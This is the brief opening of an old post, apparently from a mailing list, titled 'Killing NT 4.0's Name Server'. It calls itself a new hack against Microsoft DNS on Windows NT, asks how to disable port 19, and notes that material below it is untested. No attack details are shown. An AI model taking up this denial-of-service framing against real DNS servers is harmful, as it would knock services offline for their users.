Killing NT 4.0's Name Server

A new day; a new hack...
This was forwarded to me by a friend of mine a little while ago. If port
19 is active on an NT machine (that's also running MS DNS), can that port
be disabled without causing any problems? If so, how? I know it's
mentioned in
c:\winnt\system32\drivers\etc\servers

I have NOT tested what's mentioned below...
